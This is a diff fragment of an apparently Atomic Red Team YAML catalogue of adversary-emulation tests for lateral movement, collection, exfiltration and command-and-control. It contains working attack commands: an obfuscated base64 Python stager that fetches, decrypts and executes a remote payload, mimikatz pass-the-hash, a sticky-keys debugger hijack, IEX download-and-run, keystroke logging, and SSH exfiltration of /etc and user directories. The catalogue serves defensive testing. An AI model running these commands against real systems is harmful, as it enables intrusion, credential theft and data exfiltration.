command: 'osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK''));\"
| python &""
'
'':
technique:
name: Third-party Software
@@ -14710,8 +15290,9 @@ lateral-movement:
identifier: T1037
atomic_tests:
- name: Logon Scripts
description: |
Added Via Reg.exe
description: 'Added Via Reg.exe
'
supported_platforms:
- windows
input_arguments:
@@ -14721,11 +15302,14 @@ lateral-movement:
default: cmd.exe /c calc.exe
executor:
name: command_prompt
command: |
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "#{script_command}"
command: 'REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ
/d "#{script_command}"
'
- name: Logon Scripts - Mac
description: |
Mac logon script
description: 'Mac logon script
'
supported_platforms:
- macos
executor:
@@ -14806,11 +15390,13 @@ lateral-movement:
default: cc36cf7a8514893efccd3324464tkg1a
executor:
name: command_prompt
command: |
mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
command: 'mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
'
- name: Mimikatz Kerberos Ticket Attack
description: |
Similar to PTH, but attacking Kerberos
description: 'Similar to PTH, but attacking Kerberos
'
supported_platforms:
- windows
input_arguments:
@@ -14824,8 +15410,9 @@ lateral-movement:
default: atomic.local
executor:
name: command_prompt
command: |
mimikatz # kerberos::ptt #{user_name}@#{domain}
command: 'mimikatz # kerberos::ptt #{user_name}@#{domain}
'
T1076:
technique:
name: Remote Desktop Protocol
@@ -14900,8 +15487,11 @@ lateral-movement:
identifier: T1076
atomic_tests:
- name: RDP
description: |
RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
description: 'RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6)
- how to hijack RDS and RemoteApp sessions transparently to move through an
organization
'
supported_platforms:
- windows
executor:
@@ -14967,8 +15557,9 @@ lateral-movement:
identifier: T1105
atomic_tests:
- name: xxxx
description: |
xxxx
description: 'xxxx
'
supported_platforms:
- linux
- macos
@@ -15096,8 +15687,9 @@ lateral-movement:
identifier: T1077
atomic_tests:
- name: Map admin share
description: |
Connecting To Remote Shares
description: 'Connecting To Remote Shares
'
supported_platforms:
- windows
input_arguments:
@@ -15119,11 +15711,14 @@ lateral-movement:
default: Target
executor:
name: command_prompt
command: |
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
command: 'cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password}
/u:#{user_name}"
'
- name: Map Admin Share PowerShell
description: |
Map Admin share utilizing PowerShell
description: 'Map Admin share utilizing PowerShell
'
supported_platforms:
- windows
input_arguments:
@@ -15141,8 +15736,9 @@ lateral-movement:
default: g
executor:
name: powershell
command: |
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
command: 'New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
'
T1028:
technique:
name: Windows Remote Management
@@ -15201,14 +15797,16 @@ lateral-movement:
identifier: T1028
atomic_tests:
- name: Enable Windows Remote Management
description: |
Powershell Enable WinRM
description: 'Powershell Enable WinRM
'
supported_platforms:
- windows
executor:
name: powershell
command: |
Enable-PSRemoting -Force
command: 'Enable-PSRemoting -Force
'
- name: PowerShell Lateral Movement
description: |
Powershell lateral movement using the mmc20 application com object
@@ -15225,11 +15823,14 @@ lateral-movement:
default: computer1
executor:
name: command_prompt
command: |
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
command: 'powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
$null, $null, "7")
'
- name: WMIC Process Call Create
description: |
Utilize WMIC to start remote process
description: 'Utilize WMIC to start remote process
'
supported_platforms:
- windows
input_arguments:
@@ -15247,11 +15848,16 @@ lateral-movement:
default: Target
executor:
name: command_prompt
command: |
wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
command: 'wmic /user:#{user_name} /password:#{password} /node:#{computer_name}
process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\"
/t REG_SZ /d \"cmd.exe\" /f"
'
- name: Psexec
description: |
Utilize psexec to start remote process
description: 'Utilize psexec to start remote process
'
supported_platforms:
- windows
input_arguments:
@@ -15269,11 +15875,13 @@ lateral-movement:
default: Target
executor:
name: command_prompt
command: |
psexec \\host -u domain\user -p password -s cmd.exe
command: 'psexec \\host -u domain\user -p password -s cmd.exe
'
- name: Invoke-Command
description: |
Execute Invoke-command on remote host
description: 'Execute Invoke-command on remote host
'
supported_platforms:
- windows
input_arguments:
@@ -15287,8 +15895,9 @@ lateral-movement:
default: ipconfig
executor:
name: powershell
command: |
invoke-command -computer_name #{host_name} -scriptblock {#{remote_command}}
command: 'invoke-command -computer_name #{host_name} -scriptblock {#{remote_command}}
'
collection:
T1123:
technique:
@@ -15334,8 +15943,9 @@ collection:
identifier: T1123
atomic_tests:
- name: SourceRecorder via Windows command prompt
description: |
Create a file called test.wma, with the duration of 30 seconds
description: 'Create a file called test.wma, with the duration of 30 seconds
'
supported_platforms:
- windows
input_arguments:
@@ -15349,17 +15959,18 @@ collection:
default: 30
executor:
name: command_prompt
command: |
SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
command: 'SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
'
- name: PowerShell Cmdlet via Windows command prompt
description: |
[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)
description: "[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)\n"
supported_platforms:
- windows
executor:
name: command_prompt
command: |
powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
'
T1119:
technique:
name: Automated Collection
@@ -15413,8 +16024,9 @@ collection:
identifier: T1119
atomic_tests:
- name: Automated Collection Command Prompt
description: |
Automated Collection
description: 'Automated Collection
'
supported_platforms:
- windows
executor:
@@ -15423,14 +16035,17 @@ collection:
dir c: /b /s .docx | findstr /e .docx
for /R c: %f in (*.docx) do copy %f c:\temp\
- name: Automated Collection PowerShell
description: |
Automated Collection
description: 'Automated Collection
'
supported_platforms:
- windows
executor:
name: powershell
command: |
Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp}
command: 'Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName
-destination c:\temp}
'
T1115:
technique:
name: Clipboard Data
@@ -15473,8 +16088,9 @@ collection:
identifier: T1115
atomic_tests:
- name: Utilize Clipboard to store or execute commands from
description: |
Add data to clipboard to copy off or execute commands from.
description: 'Add data to clipboard to copy off or execute commands from.
'
supported_platforms:
- windows
executor:
@@ -15483,8 +16099,10 @@ collection:
dir | clip
clip < readme.txt
- name: PowerShell
description: |
Utilize PowerShell to echo a command to clipboard and execute it
description: 'Utilize PowerShell to echo a command to clipboard and execute
it
'
supported_platforms:
- windows
executor:
@@ -15532,14 +16150,18 @@ collection:
identifier: T1074
atomic_tests:
- name: Stage data from Discovery.bat
description: |
Utilize powershell to download discovery.bat and save to a local file
description: 'Utilize powershell to download discovery.bat and save to a local
file
'
supported_platforms:
- windows
executor:
name: powershell
command: |
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
command: '"IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat'')"
> c:\windows\pi.log
'
'':
technique:
name: Video Capture
@@ -15670,8 +16292,7 @@ collection:
default: c:\key.log
executor:
name: powershell
command: |
.\Get-Keystrokes.ps1 -LogPath #{filepath}
command: ".\\Get-Keystrokes.ps1 -LogPath #{filepath}\n"
T1113:
technique:
name: Screen Capture
@@ -15720,42 +16341,49 @@ collection:
identifier: T1113
atomic_tests:
- name: Screencapture
description: |
Use screencapture command to collect a full desktop screenshot
description: 'Use screencapture command to collect a full desktop screenshot
'
supported_platforms:
- macos
input_arguments:
output_file:
description: |
xxx
description: 'xxx
'
type: Path
default: desktop.png
executor:
name: bash
command: screencapture
- name: Screencapture (silent)
description: |
Use screencapture command to collect a full desktop screenshot
description: 'Use screencapture command to collect a full desktop screenshot
'
supported_platforms:
- macos
input_arguments:
output_file:
description: |
xxx
description: 'xxx
'
type: Path
default: desktop.png
executor:
name: bash
command: screencapture -x
- name: X Windows Capture
description: |
Use xwd command to collect a full desktop screenshot and review file with xwud
description: 'Use xwd command to collect a full desktop screenshot and review
file with xwud
'
supported_platforms:
- linux
input_arguments:
output_file:
description: |
xxx
description: 'xxx
'
type: Path
default: desktop.xwd
executor:
@@ -15764,14 +16392,16 @@ collection:
xwd -root -out #{output_file}
xwud -in #{output_file}
- name: Import
description: |
Use import command to collect a full desktop screenshot
description: 'Use import command to collect a full desktop screenshot
'
supported_platforms:
- linux
input_arguments:
output_file:
description: |
xxx
description: 'xxx
'
type: Path
default: desktop.png
executor:
@@ -15863,8 +16493,9 @@ exfiltration:
identifier: T1002
atomic_tests:
- name: Compress Data for Exfiltration With PowerShell
description: |
TODO
description: 'TODO
'
supported_platforms:
- windows
input_arguments:
@@ -15878,11 +16509,13 @@ exfiltration:
default: C:\test\Data.zip
executor:
name: powershell
command: |
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
'
- name: Compress Data for Exfiltration With Rar
description: |
TODO
description: 'TODO
'
supported_platforms:
- windows
input_arguments:
@@ -15896,11 +16529,13 @@ exfiltration:
default: exfilthis.rar
executor:
name: command_prompt
command: |
rar a -r #{output_file} #{input_file}
command: 'rar a -r #{output_file} #{input_file}
'
- name: Data Compressed - nix
description: |
TODO
description: 'TODO
'
supported_platforms:
- linux
- macos
@@ -15978,8 +16613,9 @@ exfiltration:
identifier: T1022
atomic_tests:
- name: Data Encrypted
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
- centos
@@ -16040,8 +16676,9 @@ exfiltration:
identifier: T1030
atomic_tests:
- name: Data Transfer Size Limits
description: |
Take a file/directory, split it into 5Mb chunks
description: 'Take a file/directory, split it into 5Mb chunks
'
supported_platforms:
- macos
- centos
@@ -16129,8 +16766,9 @@ exfiltration:
default: atomic
executor:
name: sh
command: |
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
command: 'ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
'
- name: Exfiltration Over Alternative Protocol - SSH
description: |
Input a domain and test Exfiltration over SSH
@@ -16143,11 +16781,15 @@ exfiltration:
- linux
executor:
name: sh
command: |
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh
#{user_name}@#{domain} ''cat > /Users.tar.gz.enc''
'
- name: Exfiltration Over Alternative Protocol - HTTP
description: |
A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.
description: 'A firewall rule (iptables or firewalld) will be needed to allow
exfiltration on port 1337.
'
supported_platforms:
- macos
- centos
@@ -16295,8 +16937,9 @@ command-and-control:
identifier: T1132
atomic_tests:
- name: Base64 Encoded data.
description: |
Utilizing a common technique for posting base64 encoded data.
description: 'Utilizing a common technique for posting base64 encoded data.
'
supported_platforms:
- macos
- linux
@@ -16370,8 +17013,9 @@ command-and-control:
identifier: T1105
atomic_tests:
- name: xxxx
description: |
xxxx
description: 'xxxx
'
supported_platforms:
- linux
- macos
@@ -16454,8 +17098,9 @@ command-and-control:
identifier: T1065
atomic_tests:
- name: Testing usage of uncommonly used port with PowerShell
description: |
Testing uncommonly used port utilizing PowerShell
description: 'Testing uncommonly used port utilizing PowerShell
'
supported_platforms:
- windows
input_arguments:
@@ -16469,11 +17114,13 @@ command-and-control:
default: google.com
executor:
name: powershell
command: |
test-netconnection -ComputerName #{domain} -port #{port}
command: 'test-netconnection -ComputerName #{domain} -port #{port}
'
- name: Testing usage of uncommonly used port
description: |
Testing uncommonly used port utilizing telnet.
description: 'Testing uncommonly used port utilizing telnet.
'
supported_platforms:
- linux
- macos
@@ -16488,8 +17135,9 @@ command-and-control:
default: google.com
executor:
name: sh
command: |
telnet #{domain} #{port}
command: 'telnet #{domain} #{port}
'
initial-access:
'':
technique: